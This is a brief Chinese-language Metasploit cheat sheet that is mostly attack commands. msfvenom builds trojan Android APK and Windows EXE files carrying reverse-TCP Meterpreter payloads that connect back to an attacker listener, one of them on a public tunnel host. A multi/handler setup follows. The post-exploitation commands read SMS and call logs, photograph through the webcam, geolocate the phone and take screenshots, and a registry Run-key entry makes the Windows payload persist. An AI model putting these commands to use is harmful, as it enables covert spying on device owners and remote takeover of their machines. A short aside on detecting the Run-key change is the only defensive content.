Android #
msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件
如
msfvenom -p android -p android/meterpreter/reverse_tcp LHOST=192.168.43.97 LPORT=5555 R> demo.apk
启动msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.134.129
set lport 555
exploit/run
在手机上启动
sysinfo //查看手机信息
app_list //查看安装的app
webcam_snap //拍照
dump_sms //查看短信
dump_calllog //通话记录
geolocate //GPS
screenshot //截屏
Win #
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10189 -f exe -o 123.exe
启动msfconsole
free.idcfengye.com
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost free.idcfengye.com
set lport 1234
run/exploit
等待目标上线
shell //获取目标shell
win常用
dir //目录
type //打印txt
start // 以默认程序启动,如start 127.0.0.1/a.jpg就是以默认浏览器打开网页
chcp 65001 //解决中文乱码
设置开机自启动(写入 HKLM 的 Run 注册表项;防御侧可监控该键下值的新增或修改,如 Sysmon 事件 ID 13,对应 ATT&CK T1547.001)
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run" /v shell.exe /d "C:\WINDOWS\system32
" /f
reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run” /v shell.exe /d “C:\WINDOWS\system32 " /f